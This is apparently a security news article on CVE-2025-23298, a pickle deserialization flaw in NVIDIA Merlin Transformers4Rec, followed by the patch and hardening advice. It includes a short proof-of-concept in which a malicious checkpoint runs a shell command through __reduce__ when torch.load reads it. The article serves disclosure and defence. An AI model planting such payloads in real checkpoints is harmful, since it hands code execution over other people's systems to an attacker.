NVIDIA Merlin Flaw Enables Remote Code Execution with Root Access


A critical vulnerability in NVIDIA’s Merlin Transformers4Rec library allows attackers to achieve remote code execution with root privileges.

Discovered by the Trend Micro Zero Day Initiative (ZDI) Threat Hunting Team, the flaw stems from unsafe deserialization in the model checkpoint loading functionality.

Tracked as CVE-2025-23298, this vulnerability underscores the persistent security challenges in machine learning frameworks that rely on Python’s pickle serialization.

Discovery of Unsafe Deserialization

While auditing ML/AI frameworks for supply chain risks, ZDI researchers focused on how models are persisted and loaded.

In Transformers4Rec’s load_model_trainer_states_from_checkpoint function, PyTorch’s torch.load() is used without sandboxing or class restrictions.
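The vulnerable pattern looks roughly like the following simplified sketch (hypothetical code for illustration; the function body and argument names are assumptions, not the library's actual source):

```python
# Hypothetical, simplified sketch of the vulnerable pattern; not the
# actual Transformers4Rec implementation.
import torch

def load_model_trainer_states_from_checkpoint(checkpoint_path, model, trainer):
    # Unsafe: without weights_only=True, torch.load() performs full
    # pickle deserialization of attacker-controllable data.
    state = torch.load(checkpoint_path)
    model.load_state_dict(state["model_state_dict"])
    trainer.optimizer.load_state_dict(state["optimizer_state_dict"])
    return state
```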

CVE            | Affected Product               | Impact                        | CVSS 3.1 Score
CVE-2025-23298 | NVIDIA Merlin Transformers4Rec | Remote Code Execution as root | 9.8

Because torch.load() uses Python’s pickle protocol, it can execute arbitrary code during deserialization.

ZDI confirmed that loading a crafted checkpoint file could trigger root-level commands immediately when restoring model state.

To demonstrate the risk, the research team built a malicious checkpoint object whose __reduce__ method invokes system commands.

When torch.save() writes the malicious object into a checkpoint and torch.load() later reads it, the attacker’s payload runs before any model weights are processed.
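A minimal proof-of-concept of this class of attack looks like the following sketch (the payload command here is illustrative, not ZDI's actual exploit):

```python
import os
import torch

class MaliciousCheckpoint:
    def __reduce__(self):
        # pickle calls this during deserialization; the returned callable
        # runs with the privileges of the loading process.
        return (os.system, ("id > /tmp/pwned",))

# Attacker side: embed the object in an otherwise ordinary checkpoint.
torch.save({"model_state_dict": MaliciousCheckpoint()}, "evil_checkpoint.pt")

# Victim side: the payload executes before any weights are restored.
# weights_only=False was the default behavior in PyTorch before 2.6.
torch.load("evil_checkpoint.pt", weights_only=False)
```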

In production environments, where ML services often run with elevated privileges, this leads to full system compromise.

From there, an attacker can exfiltrate data, install backdoors, and pivot to other systems on the network.

NVIDIA patched the vulnerability in Transformers4Rec commit b7eaea5 (PR #802), replacing direct pickle calls with a custom loader that restricts deserialization to approved classes.

The new implementation uses a secure load() function in serialization.py to validate object types before restoration.
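The description suggests an allowlist-based unpickler along these lines (a hedged sketch in the spirit of the fix; the allowlist entries and the actual structure of serialization.py are assumptions):

```python
# Sketch of an allowlist-restricted loader: only explicitly approved
# classes may be reconstructed; everything else raises an error.
import io
import pickle

# Illustrative entries only; a real allowlist must be tuned to the
# types a legitimate checkpoint actually contains.
ALLOWED_CLASSES = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_CLASSES:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"Blocked deserialization of {module}.{name}"
        )

def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```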

To prevent similar issues, developers should avoid untrusted pickle data, use PyTorch’s weights_only=True option, and adopt safer formats such as safetensors or ONNX.
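Both safer options are straightforward to adopt, assuming a standard PyTorch checkpoint (file names below are placeholders):

```python
import torch

# Option 1: weights_only=True restricts deserialization to tensors and
# other primitive containers (and is the default since PyTorch 2.6).
state = torch.load("checkpoint.pt", weights_only=True)

# Option 2: safetensors stores raw tensor data with no code-execution
# path at all (requires the `safetensors` package).
from safetensors.torch import load_file, save_file

save_file({"weight": torch.zeros(4, 4)}, "model.safetensors")
tensors = load_file("model.safetensors")
```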

Organizations must enforce model provenance checks, sign checkpoints cryptographically, and sandbox model loading.
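A provenance check can be as simple as verifying an HMAC over the checkpoint bytes before anything is deserialized; the sketch below assumes the signing step and key distribution happen out of band:

```python
# Verify a shared-key HMAC signature over the checkpoint file before
# passing it to any deserializer.
import hashlib
import hmac
from pathlib import Path

def verify_checkpoint(path: str, signature: bytes, key: bytes) -> bool:
    digest = hmac.new(key, Path(path).read_bytes(), hashlib.sha256).digest()
    return hmac.compare_digest(digest, signature)

# Only load after the signature check passes:
# if verify_checkpoint("checkpoint.pt", sig, key):
#     state = torch.load("checkpoint.pt", weights_only=True)
```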

This vulnerability highlights the urgent need for secure serialization standards in ML/AI ecosystems and demonstrates that pickle-based workflows remain a critical attack vector despite long-standing community warnings.
